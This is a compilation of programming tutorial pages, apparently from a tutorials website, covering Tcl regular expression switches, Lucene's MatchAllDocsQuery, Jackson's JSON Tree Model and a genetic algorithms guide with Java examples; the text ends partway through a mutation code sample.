regexp {([A-Za-z]*).([A-Za-z]*)} "Tcl Tutorial" a b c 
puts "Full Match: $a"
puts "Sub Match1: $b"
puts "Sub Match2: $c"

When the above code is executed, it produces the following result −

Full Match: Tcl Tutorial
Sub Match1: Tcl
Sub Match2: Tutorial

A modified version of the above code to show that a sub pattern can contain multiple patterns is shown below −

#!/usr/bin/tclsh

regexp {([A-Za-z]*.([A-Za-z]*))} "Tcl Tutorial" a b c 
puts "Full Match: $a"
puts "Sub Match1: $b"
puts "Sub Match2: $c"

When the above code is executed, it produces the following result −

Full Match: Tcl Tutorial
Sub Match1: Tcl Tutorial
Sub Match2: Tutorial

The list of switches available in Tcl is −

nocase − Used to ignore case.

indices − Store the locations of matched sub patterns instead of the matched characters.

line − Newline-sensitive matching. Ignores the characters after a newline.

start index − Sets the offset at which the search for the pattern starts.
-- − Marks the end of switches.

In the above examples, I have deliberately used [A-Za-z] for all alphabets; you can simply use -nocase instead, as shown below −

#!/usr/bin/tclsh

regexp -nocase {([A-Z]*.([A-Z]*))} "Tcl Tutorial" a b c 
puts "Full Match: $a"
puts "Sub Match1: $b"
puts "Sub Match2: $c"

When the above code is executed, it produces the following result −

Full Match: Tcl Tutorial
Sub Match1: Tcl Tutorial
Sub Match2: Tutorial

Another example using switches is shown below −

#!/usr/bin/tclsh

regexp -nocase -line -- {([A-Z]*.([A-Z]*))} "Tcl \nTutorial" a b 
puts "Full Match: $a"
puts "Sub Match1: $b"
regexp -nocase -start 4 -line -- {([A-Z]*.([A-Z]*))} "Tcl \nTutorial" a b 
puts "Full Match: $a"
puts "Sub Match1: $b"

When the above code is executed, it produces the following result −

Full Match: Tcl
Sub Match1: Tcl
Full Match: Tutorial
Sub Match1: Tutorial
Lucene - MatchAllDocsQuery
MatchAllDocsQuery, as the name suggests, matches all the documents. Following is the declaration for the org.apache.lucene.search.MatchAllDocsQuery class −

public class MatchAllDocsQuery
   extends Query

MatchAllDocsQuery()

MatchAllDocsQuery(String normsField)

Weight createWeight(Searcher searcher)
Expert: Constructs an appropriate Weight implementation for this query.

boolean equals(Object o)

void extractTerms(Set terms)
Expert: adds all terms occurring in this query to the terms set.

int hashCode()

String toString(String field)
Prints a query to a string, with field assumed to be the default field and omitted.

This class inherits methods from the following classes −

org.apache.lucene.search.Query
java.lang.Object

private void searchUsingMatchAllDocsQuery(String searchQuery)
   throws IOException, ParseException {
   searcher = new Searcher(indexDir);
   long startTime = System.currentTimeMillis();
   
   //create the match-all query object
   Query query = new MatchAllDocsQuery(searchQuery);
   //do the search
   TopDocs hits = searcher.search(query);
   long endTime = System.currentTimeMillis();

   System.out.println(hits.totalHits +
      " documents found. Time :" + (endTime - startTime) + "ms");
   for(ScoreDoc scoreDoc : hits.scoreDocs) {
      Document doc = searcher.getDocument(scoreDoc);
      System.out.print("Score: "+ scoreDoc.score + " ");
      System.out.println("File: "+ doc.get(LuceneConstants.FILE_PATH));
   }
   searcher.close();
}

Let us create a test Lucene application to test search using MatchAllDocsQuery.

Create a project with a name LuceneFirstApplication under a package com.tutorialspoint.lucene as explained in the Lucene - First Application chapter. You can also use the project created in the Lucene - First Application chapter as such for this chapter to understand the searching process.

Create LuceneConstants.java and Searcher.java as explained in the Lucene - First Application chapter. Keep the rest of the files unchanged.

Create LuceneTester.java as mentioned below.

Clean and Build the application to make sure business logic is working as per the requirements.

This class is used to provide various constants to be used across the sample application.

package com.tutorialspoint.lucene;

public class LuceneConstants {
   public static final String CONTENTS = "contents";
   public static final String FILE_NAME = "filename";
   public static final String FILE_PATH = "filepath";
   public static final int MAX_SEARCH = 10;
}

This class is used to read the indexes made on raw data and searches the data using the Lucene library.
package com.tutorialspoint.lucene; import java.io.File; import java.io.IOException; import org.apache.lucene.analysis.standard.StandardAnalyzer; import org.apache.lucene.document.Document; import org.apache.lucene.index.CorruptIndexException; import org.apache.lucene.queryParser.ParseException; import org.apache.lucene.queryParser.QueryParser; import org.apache.lucene.search.IndexSearcher; import org.apache.lucene.search.Query; import org.apache.lucene.search.ScoreDoc; import org.apache.lucene.search.TopDocs; import org.apache.lucene.store.Directory; import org.apache.lucene.store.FSDirectory; import org.apache.lucene.util.Version; public class Searcher { IndexSearcher indexSearcher; QueryParser queryParser; Query query; public Searcher(String indexDirectoryPath) throws IOException { Directory indexDirectory = FSDirectory.open(new File(indexDirectoryPath)); indexSearcher = new IndexSearcher(indexDirectory); queryParser = new QueryParser(Version.LUCENE_36, LuceneConstants.CONTENTS, new StandardAnalyzer(Version.LUCENE_36)); } public TopDocs search( String searchQuery) throws IOException, ParseException { query = queryParser.parse(searchQuery); return indexSearcher.search(query, LuceneConstants.MAX_SEARCH); } public TopDocs search(Query query) throws IOException, ParseException { return indexSearcher.search(query, LuceneConstants.MAX_SEARCH); } public Document getDocument(ScoreDoc scoreDoc) throws CorruptIndexException, IOException { return indexSearcher.doc(scoreDoc.doc); } public void close() throws IOException { indexSearcher.close(); } } This class is used to test the searching capability of the Lucene library. package com.tutorialspoint.lucene; import java.io.IOException; import org.apache.lucene.document.Document; import org.apache.lucene.index.Term; import org.apache.lucene.queryParser.ParseException; import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.search.Query; import org.apache.lucene.search.ScoreDoc; import org.apache.lucene.search.TopDocs; public class LuceneTester { String indexDir = "E:\\Lucene\\Index"; String dataDir = "E:\\Lucene\\Data"; Searcher searcher; public static void main(String[] args) { LuceneTester tester; try { tester = new LuceneTester(); tester.searchUsingMatchAllDocsQuery(""); } catch (IOException e) { e.printStackTrace(); } catch (ParseException e) { e.printStackTrace(); } } private void searchUsingMatchAllDocsQuery(String searchQuery) throws IOException, ParseException { searcher = new Searcher(indexDir); long startTime = System.currentTimeMillis(); //create the term query object Query query = new MatchAllDocsQuery(searchQuery); //do the search TopDocs hits = searcher.search(query); long endTime = System.currentTimeMillis(); System.out.println(hits.totalHits + " documents found. Time :" + (endTime - startTime) + "ms"); for(ScoreDoc scoreDoc : hits.scoreDocs) { Document doc = searcher.getDocument(scoreDoc); System.out.print("Score: "+ scoreDoc.score + " "); System.out.println("File: "+ doc.get(LuceneConstants.FILE_PATH)); } searcher.close(); } } I've used 10 text files from record1.txt to record10.txt containing names and other details of the students and put them in the directory E:\Lucene\Data. Test Data. An index directory path should be created as E:\Lucene\Index. After running the indexing program in the chapter Lucene - Indexing Process, you can see the list of index files created in that folder. 
Once you are done with the creation of the source, the raw data, the data directory, the index directory and the indexes, you can proceed by compiling and running your program. To do this, keep the LuceneTester.Java file tab active and use either the Run option available in the Eclipse IDE or use Ctrl + F11 to compile and run your LuceneTester application. If your application runs successfully, it will print the following message in Eclipse IDE's console − 10 documents found. Time :9ms Score: 1.0 File: E:\Lucene\Data\record1.txt Score: 1.0 File: E:\Lucene\Data\record10.txt Score: 1.0 File: E:\Lucene\Data\record2.txt Score: 1.0 File: E:\Lucene\Data\record3.txt Score: 1.0 File: E:\Lucene\Data\record4.txt Score: 1.0 File: E:\Lucene\Data\record5.txt Score: 1.0 File: E:\Lucene\Data\record6.txt Score: 1.0 File: E:\Lucene\Data\record7.txt Score: 1.0 File: E:\Lucene\Data\record8.txt Score: 1.0 File: E:\Lucene\Data\record9.txt Print Add Notes Bookmark this page
Jackson - Tree Model
Tree Model prepares an in-memory tree representation of the JSON document. ObjectMapper builds a tree of JsonNode nodes. It is the most flexible approach and is analogous to a DOM parser for XML.

ObjectMapper provides a pointer to the root node of the tree after reading the JSON. The root node can be used to traverse the complete tree. Consider the following code snippet to get the root node of a provided JSON String.

//Create an ObjectMapper instance
ObjectMapper mapper = new ObjectMapper();	
String jsonString = "{\"name\":\"Mahesh Kumar\", \"age\":21,\"verified\":false,\"marks\": [100,90,85]}";
//create tree from JSON
JsonNode rootNode = mapper.readTree(jsonString);

Get each node using its relative path from the root node while traversing the tree, and process the data. Consider the following code snippet, which traverses the tree given the root node.

JsonNode nameNode = rootNode.path("name");
System.out.println("Name: "+ nameNode.textValue());
 
JsonNode marksNode = rootNode.path("marks");
Iterator<JsonNode> iterator = marksNode.elements();

Create a Java class file named JacksonTester in C:\>Jackson_WORKSPACE.

File: JacksonTester.java

import java.io.IOException;
import java.util.Iterator;

import com.fasterxml.jackson.core.JsonParseException;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;

public class JacksonTester {
   public static void main(String args[]){

      try {
         ObjectMapper mapper = new ObjectMapper();
         String jsonString = "{\"name\":\"Mahesh Kumar\", \"age\":21,\"verified\":false,\"marks\": [100,90,85]}";
         JsonNode rootNode = mapper.readTree(jsonString);

         JsonNode nameNode = rootNode.path("name");
         System.out.println("Name: "+ nameNode.textValue());

         JsonNode ageNode = rootNode.path("age");
         System.out.println("Age: " + ageNode.intValue());

         JsonNode verifiedNode = rootNode.path("verified");
         System.out.println("Verified: " + (verifiedNode.booleanValue() ? "Yes":"No"));

         JsonNode marksNode = rootNode.path("marks");
         Iterator<JsonNode> iterator = marksNode.elements();
         System.out.print("Marks: [ ");

         while (iterator.hasNext()) {
            JsonNode marks = iterator.next();
            System.out.print(marks.intValue() + " "); 
         }

         System.out.println("]");
      }
      catch (JsonParseException e) { e.printStackTrace(); }
      catch (JsonMappingException e) { e.printStackTrace(); }
      catch (IOException e) { e.printStackTrace(); }
   }
}

Verify the result

Compile the classes using javac compiler as follows:

C:\Jackson_WORKSPACE>javac JacksonTester.java

Now run the JacksonTester to see the result:

C:\Jackson_WORKSPACE>java JacksonTester

Verify the Output

Name: Mahesh Kumar
Age: 21
Verified: No
Marks: [ 100 90 85 ]
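The tree can also be written back out as JSON, or bound to Java objects, using the same ObjectMapper. The following is a minimal sketch, not part of the original example: it assumes the Jackson 2 API used above, and the commented Student class is a hypothetical POJO whose fields match the JSON keys.

import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.node.ObjectNode;

public class TreeRoundTripTester {
   public static void main(String args[]) throws Exception {
      ObjectMapper mapper = new ObjectMapper();
      String jsonString = "{\"name\":\"Mahesh Kumar\", \"age\":21}";
      JsonNode rootNode = mapper.readTree(jsonString);

      //modify the tree in memory, then write it back out as JSON
      ((ObjectNode) rootNode).put("verified", true);
      String json = mapper.writeValueAsString(rootNode);
      System.out.println(json);

      //bind the tree (or any sub-node) to a Java object
      //Student student = mapper.treeToValue(rootNode, Student.class);
   }
}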
Genetic Algorithms - Quick Guide
Genetic Algorithm (GA) is a search-based optimization technique based on the principles of Genetics and Natural Selection. It is frequently used to find optimal or near-optimal solutions to difficult problems which otherwise would take a lifetime to solve, and is widely applied to optimization problems, in research, and in machine learning.
Optimization is the process of making something better. In any process, we have a set of inputs and a set of outputs as shown in the following figure.
Optimization refers to finding the values of inputs in such a way that we get the “best” output values. The definition of “best” varies from problem to problem, but in mathematical terms, it refers to maximizing or minimizing one or more objective functions, by varying the input parameters.
The set of all possible solutions or values which the inputs can take make up the search space. In this search space lies a point or a set of points which gives the optimal solution. The aim of optimization is to find that point or set of points in the search space.
Nature has always been a great source of inspiration to all mankind. Genetic Algorithms (GAs) are search based algorithms based on the concepts of natural selection and genetics. GAs are a subset of a much larger branch of computation known as Evolutionary Computation.
GAs were developed by John Holland and his students and colleagues at the University of Michigan, most notably David E. Goldberg, and have since been tried on various optimization problems with a high degree of success.
In GAs, we have a pool or a population of possible solutions to the given problem. These solutions then undergo recombination and mutation (like in natural genetics), producing new children, and the process is repeated over various generations. Each individual (or candidate solution) is assigned a fitness value (based on its objective function value) and the fitter individuals are given a higher chance to mate and yield more “fit” individuals. This is in line with the Darwinian Theory of “Survival of the Fittest”.
In this way we keep “evolving” better individuals or solutions over generations, till we reach a stopping criterion.
Genetic Algorithms are sufficiently randomized in nature, but they perform much better than random local search (in which we just try various random solutions, keeping track of the best so far), as they exploit historical information as well.
GAs have various advantages which have made them immensely popular. These include −
Does not require any derivative information (which may not be available for many real-world problems).
Is faster and more efficient as compared to the traditional methods.
Has very good parallel capabilities.
Optimizes both continuous and discrete functions and also multi-objective problems.
Provides a list of “good” solutions and not just a single solution.
Always gets an answer to the problem, which gets better over time.
Useful when the search space is very large and there are a large number of parameters involved.
Like any technique, GAs also suffer from a few limitations. These include −
GAs are not suited for all problems, especially problems which are simple and for which derivative information is available.
Fitness value is calculated repeatedly, which might be computationally expensive for some problems.
Being stochastic, there are no guarantees on the optimality or the quality of the solution.
If not implemented properly, the GA may not converge to the optimal solution.
Genetic Algorithms have the ability to deliver a “good-enough” solution “fast-enough”. This makes genetic algorithms attractive for use in solving optimization problems. The reasons why GAs are needed are as follows −
In computer science, there is a large set of problems which are NP-Hard. What this essentially means is that even the most powerful computing systems take a very long time (even years!) to solve such a problem. In such a scenario, GAs prove to be an efficient tool to provide usable near-optimal solutions in a short amount of time.
Traditional calculus based methods work by starting at a random point and by moving in the direction of the gradient, till we reach the top of the hill. This technique is efficient and works very well for single-peaked objective functions like the cost function in linear regression. But, in most real-world situations, we have very complex search landscapes, made of many peaks and many valleys, which cause such methods to fail, as they suffer from an inherent tendency of getting stuck at the local optima as shown in the following figure.
Some difficult problems, like the Travelling Salesperson Problem (TSP), have real-world applications like path finding and VLSI design. Now imagine that you are using your GPS Navigation system, and it takes a few minutes (or even a few hours) to compute the “optimal” path from the source to destination. Delay in such real world applications is not acceptable and therefore a “good-enough” solution, which is delivered “fast”, is what is required.
This section introduces the basic terminology required to understand GAs. Also, a generic structure of GAs is presented in both pseudo-code and graphical forms. The reader is advised to properly understand all the concepts introduced in this section and keep them in mind when reading other sections of this tutorial as well.
Before beginning a discussion on Genetic Algorithms, it is essential to be familiar with some basic terminology which will be used throughout this tutorial.
Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings.
Chromosomes − A chromosome is one such solution to the given problem.
Gene − A gene is one element position of a chromosome.
Allele − It is the value a gene takes for a particular chromosome.
Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system.
Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations.
Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to the genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation. For example, consider the 0/1 Knapsack Problem. The phenotype space consists of solutions which just contain the item numbers of the items to be picked. However, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 1 at position x represents that the xth item is picked while a 0 represents the reverse. This is a case where genotype and phenotype spaces are different (a small code sketch after this list illustrates the idea).
Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem.
Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc.
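To make the genotype–phenotype distinction concrete, here is a minimal Java sketch (not part of any GA library; the class name, item profits and weights are purely illustrative) that stores a 0/1 Knapsack solution as a bit-string genotype, decodes it into the phenotype (the list of picked items) and computes a simple fitness value.
import java.util.ArrayList;
import java.util.List;

public class KnapsackChromosome {

   // Genotype: one bit per item, 1 = item is picked, 0 = item is left out.
   private final int[] genes;

   public KnapsackChromosome(int[] genes) {
      this.genes = genes;
   }

   // Decoding: transform the genotype (bit string) into the phenotype
   // (the list of item indices that are actually picked).
   public List<Integer> decode() {
      List<Integer> pickedItems = new ArrayList<>();
      for (int i = 0; i < genes.length; i++) {
         if (genes[i] == 1) {
            pickedItems.add(i);
         }
      }
      return pickedItems;
   }

   // A simple fitness function: sum of the profits of the picked items,
   // as long as the total weight fits into the knapsack capacity.
   public int fitness(int[] profits, int[] weights, int capacity) {
      int totalProfit = 0;
      int totalWeight = 0;
      for (int i = 0; i < genes.length; i++) {
         if (genes[i] == 1) {
            totalWeight += weights[i];
            if (totalWeight > capacity) {
               return 0;   // infeasible solution gets the worst fitness
            }
            totalProfit += profits[i];
         }
      }
      return totalProfit;
   }

   public static void main(String[] args) {
      int[] profits = {60, 100, 120};
      int[] weights = {10, 20, 30};
      int capacity = 50;

      // Genotype 011 → phenotype {items 1 and 2}, fitness 220.
      KnapsackChromosome solution = new KnapsackChromosome(new int[]{0, 1, 1});
      System.out.println("Picked items: " + solution.decode());
      System.out.println("Fitness: " + solution.fitness(profits, weights, capacity));
   }
}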
The basic structure of a GA is as follows −
We start with an initial population (which may be generated at random or seeded by other heuristics), select parents from this population for mating. Apply crossover and mutation operators on the parents to generate new off-springs. And finally these off-springs replace the existing individuals in the population and the process repeats. In this way genetic algorithms actually try to mimic the human evolution to some extent.
Each of the following steps is covered as a separate chapter later in this tutorial.
A generalized pseudo-code for a GA is explained in the following program −
GA()
   initialize population
   find fitness of population
   
   while (termination criteria is not reached) do
      parent selection
      crossover with probability pc
      mutation with probability pm
      decode and fitness calculation
      survivor selection
      find best
   return best
One of the most important decisions to make while implementing a genetic algorithm is deciding the representation that we will use to represent our solutions. It has been observed that improper representation can lead to poor performance of the GA.
Therefore, choosing a proper representation and having a proper definition of the mappings between the phenotype and genotype spaces is essential for the success of a GA.
In this section, we present some of the most commonly used representations for genetic algorithms. However, representation is highly problem specific and the reader might find that another representation or a mix of the representations mentioned here might suit his/her problem better.
Binary representation is one of the simplest and most widely used representations in GAs. In this type of representation the genotype consists of bit strings.
For some problems when the solution space consists of Boolean decision variables – yes or no, the binary representation is natural. Take for example the 0/1 Knapsack Problem. If there are n items, we can represent a solution by a binary string of n elements, where the xth element tells whether the item x is picked (1) or not (0).
For other problems, specifically those dealing with numbers, we can represent the numbers with their binary representation. The problem with this kind of encoding is that different bits have different significance and therefore mutation and crossover operators can have undesired consequences. This can be resolved to some extent by using Gray Coding, as a change in one bit does not have a massive effect on the solution.
For problems where we want to define the genes using continuous rather than discrete variables, the real valued representation is the most natural. The precision of these real valued or floating point numbers is however limited to the computer.
For discrete valued genes, we cannot always limit the solution space to binary ‘yes’ or ‘no’. For example, if we want to encode the four directions – North, South, East and West, we can encode them as {0,1,2,3}. In such cases, integer representation is desirable.
In many problems, the solution is represented by an order of elements. In such cases permutation representation is the most suited.
A classic example of this representation is the travelling salesman problem (TSP). In this the salesman has to take a tour of all the cities, visiting each city exactly once and come back to the starting city. The total distance of the tour has to be minimized.
The solution to this TSP is naturally an ordering or permutation of all the cities and therefore using a permutation representation makes sense for this problem.
Population is a subset of solutions in the current generation. It can also be defined as a set of chromosomes. There are several things to be kept in mind when dealing with a GA population −
The diversity of the population should be maintained otherwise it might lead to premature convergence.
The population size should not be kept very large as it can cause a GA to slow down, while a smaller population might not be enough for a good mating pool. Therefore, an optimal population size needs to be decided by trial and error.
The population is usually defined as a two-dimensional array of size population size x chromosome size.
There are two primary methods to initialize a population in a GA. They are −
Random Initialization − Populate the initial population with completely random solutions.
Heuristic initialization − Populate the initial population using a known heuristic for the problem.
It has been observed that the entire population should not be initialized using a heuristic, as it can result in the population having similar solutions and very little diversity. It has been experimentally observed that the random solutions are the ones to drive the population to optimality. Therefore, with heuristic initialization, we just seed the population with a couple of good solutions, filling up the rest with random solutions rather than filling the entire population with heuristic based solutions.
It has also been observed that heuristic initialization in some cases only affects the initial fitness of the population, but in the end, it is the diversity of the solutions which leads to optimality.
There are two population models widely in use −
In steady state GA, we generate one or two off-springs in each iteration and they replace one or two individuals from the population. A steady state GA is also known as Incremental GA.
In a generational model, we generate ‘n’ off-springs, where n is the population size, and the entire population is replaced by the new one at the end of the iteration.
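Assuming the binary encoding and the two-dimensional array layout described above, random initialization can be sketched as follows. The class and parameter names are illustrative only; a real implementation would plug this into the rest of the GA.
import java.util.Random;

public class PopulationInitializer {

   // Random initialization: every gene of every chromosome is set to 0 or 1
   // with equal probability, which gives the population maximum diversity.
   public static int[][] randomPopulation(int populationSize, int chromosomeSize, long seed) {
      Random random = new Random(seed);
      int[][] population = new int[populationSize][chromosomeSize];
      for (int i = 0; i < populationSize; i++) {
         for (int j = 0; j < chromosomeSize; j++) {
            population[i][j] = random.nextBoolean() ? 1 : 0;
         }
      }
      return population;
   }

   public static void main(String[] args) {
      int[][] population = randomPopulation(5, 8, 42);
      for (int[] chromosome : population) {
         StringBuilder bits = new StringBuilder();
         for (int gene : chromosome) {
            bits.append(gene);
         }
         System.out.println(bits);
      }
   }
}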
The fitness function simply defined is a function which takes a candidate solution to the problem as input and produces as output how “fit” or how “good” the solution is with respect to the problem in consideration.
Calculation of fitness value is done repeatedly in a GA and therefore it should be sufficiently fast. A slow computation of the fitness value can adversely affect a GA and make it exceptionally slow.
In most cases the fitness function and the objective function are the same, as the objective is to either maximize or minimize the given objective function. However, for more complex problems with multiple objectives and constraints, an Algorithm Designer might choose to have a different fitness function.
A fitness function should possess the following characteristics −
The fitness function should be sufficiently fast to compute.
It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution.
In some cases, calculating the fitness function directly might not be possible due to the inherent complexities of the problem at hand. In such cases, we do fitness approximation to suit our needs.
As a simple example, a fitness function for the 0/1 Knapsack can just sum the profit values of the items being picked (which have a 1), scanning the elements from left to right till the knapsack is full.
Parent Selection is the process of selecting parents which mate and recombine to create off-springs for the next generation. Parent selection is very crucial to the convergence rate of the GA as good parents drive individuals to better and fitter solutions.
However, care should be taken to prevent one extremely fit solution from taking over the entire population in a few generations, as this leads to the solutions being close to one another in the solution space thereby leading to a loss of diversity. Maintaining good diversity in the population is extremely crucial for the success of a GA. This taking up of the entire population by one extremely fit solution is known as premature convergence and is an undesirable condition in a GA.
Fitness Proportionate Selection is one of the most popular ways of parent selection. In this every individual can become a parent with a probability which is proportional to its fitness. Therefore, fitter individuals have a higher chance of mating and propagating their features to the next generation. Therefore, such a selection strategy applies a selection pressure to the more fit individuals in the population, evolving better individuals over time.
Consider a circular wheel. The wheel is divided into n pies, where n is the number of individuals in the population. Each individual gets a portion of the circle which is proportional to its fitness value. Two implementations of fitness proportionate selection are possible −
In a roulette wheel selection, the circular wheel is divided as described before. A fixed point is chosen on the wheel circumference and the wheel is rotated. The region of the wheel which comes in front of the fixed point is chosen as the parent. For the second parent, the same process is repeated.
It is clear that a fitter individual has a greater pie on the wheel and therefore a greater chance of landing in front of the fixed point when the wheel is rotated. Therefore, the probability of choosing an individual depends directly on its fitness.
Implementation wise, we use the following steps (a small code sketch after this list illustrates them) −
Calculate S = the sum of all fitnesses.
Generate a random number r between 0 and S.
Starting from the top of the population, keep adding the fitnesses to the partial sum P, till P < r.
The individual for which P exceeds r is the chosen individual.
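The roulette wheel steps listed above can be sketched in a few lines of Java. The method and variable names are illustrative assumptions, and the sketch assumes non-negative fitness values (fitness proportionate methods do not handle negative fitnesses, as noted below).
import java.util.Random;

public class RouletteWheelSelection {

   // Returns the index of the selected individual.
   public static int select(double[] fitness, Random random) {
      // Step 1: S = the sum of all fitnesses (assumed non-negative).
      double s = 0;
      for (double f : fitness) {
         s += f;
      }
      // Step 2: generate a random number r between 0 and S.
      double r = random.nextDouble() * s;

      // Steps 3 and 4: accumulate the fitnesses into a partial sum P;
      // the individual whose fitness makes P exceed r is chosen.
      double p = 0;
      for (int i = 0; i < fitness.length; i++) {
         p += fitness[i];
         if (p >= r) {
            return i;
         }
      }
      return fitness.length - 1; // fallback, only reached through rounding
   }

   public static void main(String[] args) {
      double[] fitness = {10.0, 40.0, 25.0, 25.0};
      Random random = new Random(7);
      int[] counts = new int[fitness.length];
      // Repeat the selection many times: fitter individuals are picked more often.
      for (int i = 0; i < 10000; i++) {
         counts[select(fitness, random)]++;
      }
      for (int i = 0; i < counts.length; i++) {
         System.out.println("Individual " + i + " selected " + counts[i] + " times");
      }
   }
}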
Stochastic Universal Sampling is quite similar to roulette wheel selection, however instead of having just one fixed point, we have multiple fixed points. Therefore, all the parents are chosen in just one spin of the wheel. Also, such a setup encourages the highly fit individuals to be chosen at least once.
It is to be noted that fitness proportionate selection methods don’t work for cases where the fitness can take a negative value.
In K-Way tournament selection, we select K individuals from the population at random and select the best out of these to become a parent. The same process is repeated for selecting the next parent. Tournament Selection is also extremely popular in literature as it can even work with negative fitness values.
Rank Selection also works with negative fitness values and is mostly used when the individuals in the population have very close fitness values (this happens usually at the end of the run). This leads to each individual having an almost equal share of the pie (like in case of fitness proportionate selection) and hence each individual, no matter how fit relative to the others, has an approximately equal probability of getting selected as a parent. This in turn leads to a loss in the selection pressure towards fitter individuals, making the GA make poor parent selections in such situations.
In this, we remove the concept of a fitness value while selecting a parent. However, every individual in the population is ranked according to their fitness. The selection of the parents depends on the rank of each individual and not the fitness. The higher ranked individuals are preferred more than the lower ranked ones.
In this strategy we randomly select parents from the existing population. There is no selection pressure towards fitter individuals and therefore this strategy is usually avoided.
In this chapter, we will discuss about what a Crossover Operator is along with its other modules, their uses and benefits.
The crossover operator is analogous to reproduction and biological crossover. In this more than one parent is selected and one or more off-springs are produced using the genetic material of the parents. Crossover is usually applied in a GA with a high probability – pc.
In this section we will discuss some of the most popularly used crossover operators. It is to be noted that these crossover operators are very generic and the GA Designer might choose to implement a problem-specific crossover operator as well.
In one-point crossover, a random crossover point is selected and the tails of the two parents are swapped to get new off-springs.
Multi point crossover is a generalization of the one-point crossover wherein alternating segments are swapped to get new off-springs.
In a uniform crossover, we don’t divide the chromosome into segments, rather we treat each gene separately. In this, we essentially flip a coin for each gene to decide whether or not it’ll be included in the off-spring. We can also bias the coin to one parent, to have more genetic material in the child from that parent.
Whole arithmetic recombination is commonly used for integer representations and works by taking the weighted average of the two parents by using the following formulae −
Child1 = α.x + (1-α).y
Child2 = α.y + (1-α).x
Obviously, if α = 0.5, then both the children will be identical.
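The following sketch illustrates two of the crossovers described above – one-point crossover for binary strings and whole arithmetic recombination for real valued chromosomes. The crossover point and α are passed in explicitly so the behaviour is easy to follow; all names are illustrative.
import java.util.Arrays;

public class CrossoverOperators {

   // One-point crossover for binary (or integer) chromosomes:
   // the tails of the two parents after the crossover point are swapped.
   public static int[][] onePoint(int[] parent1, int[] parent2, int point) {
      int[] child1 = Arrays.copyOf(parent1, parent1.length);
      int[] child2 = Arrays.copyOf(parent2, parent2.length);
      for (int i = point; i < parent1.length; i++) {
         child1[i] = parent2[i];
         child2[i] = parent1[i];
      }
      return new int[][]{child1, child2};
   }

   // Whole arithmetic recombination for real valued chromosomes:
   // child1 = a*x + (1-a)*y and child2 = a*y + (1-a)*x.
   public static double[][] wholeArithmetic(double[] x, double[] y, double alpha) {
      double[] child1 = new double[x.length];
      double[] child2 = new double[x.length];
      for (int i = 0; i < x.length; i++) {
         child1[i] = alpha * x[i] + (1 - alpha) * y[i];
         child2[i] = alpha * y[i] + (1 - alpha) * x[i];
      }
      return new double[][]{child1, child2};
   }

   public static void main(String[] args) {
      int[][] binaryChildren = onePoint(new int[]{1, 1, 1, 1, 1, 1},
                                        new int[]{0, 0, 0, 0, 0, 0}, 3);
      System.out.println(Arrays.toString(binaryChildren[0])); // [1, 1, 1, 0, 0, 0]
      System.out.println(Arrays.toString(binaryChildren[1])); // [0, 0, 0, 1, 1, 1]

      double[][] realChildren = wholeArithmetic(new double[]{1.0, 2.0},
                                                new double[]{3.0, 6.0}, 0.5);
      System.out.println(Arrays.toString(realChildren[0]));   // [2.0, 4.0]
      System.out.println(Arrays.toString(realChildren[1]));   // [2.0, 4.0] - identical when alpha = 0.5
   }
}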
The Order Crossover (OX1) is used for permutation based crossovers with the intention of transmitting information about relative ordering to the off-springs. It works as follows −
Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring.
Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list.
Repeat for the second child with the parent’s role reversed.
There exist a lot of other crossovers like Partially Mapped Crossover (PMX), Order based crossover (OX2), Shuffle Crossover, Ring Crossover, etc.
In simple terms, mutation may be defined as a small random tweak in the chromosome, to get a new solution. It is used to maintain and introduce diversity in the genetic population and is usually applied with a low probability – pm. If the probability is very high, the GA gets reduced to a random search.
Mutation is the part of the GA which is related to the “exploration” of the search space. It has been observed that mutation is essential to the convergence of the GA while crossover is not.
In this section, we describe some of the most commonly used mutation operators. Like the crossover operators, this is not an exhaustive list and the GA designer might find a combination of these approaches or a problem-specific mutation operator more useful.
In bit flip mutation, we select one or more random bits and flip them. This is used for binary encoded GAs.
Random Resetting is an extension of the bit flip for the integer representation. In this, a random value from the set of permissible values is assigned to a randomly chosen gene.
In swap mutation, we select two positions on the chromosome at random, and interchange the values. This is common in permutation based encodings.
Scramble mutation is also popular with permutation representations. In this, from the entire chromosome, a subset of genes is chosen and their values are scrambled or shuffled randomly.
In inversion mutation, we select a subset of genes like in scramble mutation, but instead of shuffling the subset, we merely invert the entire string in the subset.
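A small sketch of two of the mutation operators described above – bit flip for binary encodings and swap for permutation encodings. The mutation is applied in place here and the names are illustrative only.
import java.util.Arrays;
import java.util.Random;

public class MutationOperators {

   // Bit flip mutation: each gene is flipped independently with probability pm.
   public static void bitFlip(int[] chromosome, double pm, Random random) {
      for (int i = 0; i < chromosome.length; i++) {
         if (random.nextDouble() < pm) {
            chromosome[i] = 1 - chromosome[i];
         }
      }
   }

   // Swap mutation: two randomly chosen positions exchange their values,
   // which keeps a permutation valid (no value is lost or duplicated).
   public static void swap(int[] permutation, Random random) {
      int a = random.nextInt(permutation.length);
      int b = random.nextInt(permutation.length);
      int tmp = permutation[a];
      permutation[a] = permutation[b];
      permutation[b] = tmp;
   }

   public static void main(String[] args) {
      Random random = new Random(3);

      int[] binary = {0, 0, 0, 0, 0, 0, 0, 0};
      bitFlip(binary, 0.2, random);            // low mutation probability pm
      System.out.println(Arrays.toString(binary));

      int[] tour = {0, 1, 2, 3, 4};            // e.g. a TSP tour
      swap(tour, random);
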